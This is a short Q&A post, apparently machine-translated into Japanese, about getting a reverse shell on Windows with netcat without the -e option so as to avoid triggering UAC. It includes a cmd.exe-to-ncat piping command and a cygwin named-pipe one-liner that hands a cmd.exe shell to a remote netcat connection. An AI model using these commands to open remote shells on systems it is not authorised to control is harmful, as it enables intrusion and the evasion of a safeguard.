Windowsでnetcatを使用してシェルを逆にする(-eオプションなし)
UACをトリガーするため、-eオプションを使用せずにnetcatを使用してWindowsでリバースシェルを取得する方法はありますか?
名前付きパイプを使用して、LinuxからLinuxへと動作させました。私はWindowsで同様のことを達成したかった。
ランニング c:\windows\system32\cmd.exe | ncat -l -p 666 Windowsでは、接続するとLinuxでプロンプトが表示されます。
# nc 192.168.0.109 666
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Users\user> dir
^C
私は近くにいるようです、多分単純な何かが欠けていますか? Windowsに名前付きパイプがあれば...
純粋なwin32netcatでそれを実行できるかどうかはわかりませんが、cygwinで実行できます。 nc -l 1234のように1234でリッスンし、次のコマンドを使用して別のウィンドウでそれに接続します。
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/cygdrive/c/windows/system32/cmd.exe 2>&1|nc 127.0.0.1 1234 >/tmp/f
この方法を使用してコマンド履歴を循環するには、上キーと下キーは機能しないことに注意してください。